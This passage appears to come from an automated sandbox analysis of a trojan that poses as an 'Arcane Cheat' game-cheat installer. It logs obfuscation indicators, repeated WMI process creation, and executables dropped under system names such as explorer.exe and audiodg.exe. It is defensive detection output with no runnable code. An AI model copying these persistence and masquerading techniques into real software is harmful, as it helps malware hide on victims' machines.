            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, qRquDQai83uOYBFfrPt.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'cVoL9srqV5', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, oDSKgMeFfrJ9XFXnTvW.csHigh entropy of concatenated method names: 'cCJ25ZCr2G', 'm8v2TRS1b5', 'OSY2bWfU3o', 'w7D21JLICH', 'ceG2f9pvjR', 'Lfm2UWq4yq', 'ahnShMiMQFLRDHejCJm', 'mYJM9RiX3UjorAl9FsK', 'jCL4iiiaGXbdP5sAipG', 'Fqa68Tiwx0qbN6KIbBk'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Drops PE files with benign system names
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Recovery\explorer.exeJump to dropped file
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: unknownExecutable created and started: C:\Windows\addins\audiodg.exe
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\verify.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DQ2M9.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KH7DR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-VNH60.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M0CO5.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-9OG1R.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-CKDJ7.tmpJump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-B9PAS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsdt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeFile created: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-GMKU6.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7KMRP.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-HUQAI.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MH2RS.tmpJump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7HO40.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6IE0O.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-4VJ8E.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jaas_nt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jabswitch.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\management.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1EODK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\fontmanager.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfr.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KP5B8.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\hprof.dll (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeFile created: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\keytool.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MITQ2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jawt.dll (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-G6G2A.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FKC0I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\nio.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DLMB6.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\j2pkcs11.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-I5RLV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\eula.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KL3UV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\wsdetect.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\npjp2.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-17AF0.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\splashscreen.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\orbd.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-LUGNS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\j2pcsc.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\instrument.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge-32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\is-L2DJE.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-U0SIJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-TH2Q9.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-5VJPG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcp120.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\klist.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-SGAAD.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\glib-lite.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\java.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2native.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-P9144.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-OV1CO.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-ML2GN.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\net.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_common.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-AASG5.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-VI3JJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.exe (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Recovery\explorer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\gstreamer-lite.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\mlib_image.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-QS1JT.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.cpl (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-78EDT.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\pack200.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DCG3E.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N4812.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_sw.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\sunmscapi.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-9PR86.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\ktab.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M6OGV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F8M96.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\client\is-KHA4M.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\en-US\qiOZcVoixJLcuAFKAnRd.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-94OVM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-O5MSC.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F39U2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-0TC1S.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dll (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile created: C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\tnameserv.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\glass.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\policytool.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1NNTS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\w2k_lsa_auth.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FLHTG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6TBSI.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-D49GQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RJ8O6.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\lcms.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jpeg.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-3CGHC.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-G1B5Q.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\zip.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\client\jvm.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-C92NJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-S4T07.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\sunec.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-B9B0I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\java-rmi.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\kinit.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\unpack.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-23BHM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DK2B0.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-8BCTR.tmpJump to dropped file
